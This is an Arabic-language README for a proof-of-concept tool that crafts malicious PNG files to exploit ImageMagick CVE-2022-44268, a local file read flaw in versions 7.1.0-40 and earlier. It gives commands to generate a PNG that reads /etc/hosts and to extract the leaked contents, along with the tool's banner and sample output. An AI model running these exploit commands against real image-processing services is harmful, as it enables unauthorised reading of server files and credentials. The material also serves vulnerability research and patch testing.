
يُنشئ ملفات PNG خبيثة لاستغلال ثغرة ImageMagick LFI (CVE-2022-44268) لقراءة ملفات عشوائية، مع سكربت استخراج لإثبات المفهوم.
ImageMagick هي مجموعة برامج مجانية ومفتوحة المصدر ومتعددة المنصات لعرض وتحويل وتحرير الصور النقطية والمتجهة. يمكنها قراءة وكتابة أكثر من 200 تنسيق ملف صورة. ImageMagick مرخصة بموجب رخصة Apache 2.0. وهي متوفرة على شكل أدوات سطر أوامر، وكذلك واجهة برمجة تطبيقات C ومجموعة من فئات C++. Wikipedia
الإصدارات ImageMagick 7.1.0-40 وما دونها معرضة لثغرة تضمين ملف محلي. ترجع الثغرة إلى التحقق غير السليم من الإدخال الذي يقدمه المستخدم. يمكن للمهاجم استغلال هذه الثغرة عن طريق إرسال ملف PNG معدّل إلى الهدف. قد يسمح الاستغلال الناجح لهذه الثغرة للمهاجم بقراءة ملفات عشوائية على النظام المستهدف.
شكر للباحثين الذين اكتشفوا هذا:
إنشاء PNG ضار لاستغلال ImageMagick 7.1.0-40:
pip install Pillow)صياغة PNG باستخدام generate.py:
python3 generate.py -i input.png -f "/etc/hosts" -o exploit.png
______ __ _____ ______
| _ \ \ / / | __ \ | ____|
| |_) \ \_/ / | |__) |__ __ _ ______| |__ _ __ ___ __ _
| _ < \ / | ___/ _ \ / _` |______| __| '__/ _ \ / _` |
| |_) | | | | | | (_) | (_| | | | | | | (_) | (_| |
|____/ |_| |_| \___/ \__, | |_| |_| \___/ \__, |
__/ | __/ |
|___/ |___/
[*] ImageMagick LFI Exploit
[*] Embedding Payload to read the target file
[*] Exploit PNG generated: exploit.png
python3 extract.py downloaded_img.png
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
إخلاء مسؤولية: كن جيدًا، من فضلك لا تستخدمه لأغراض سيئة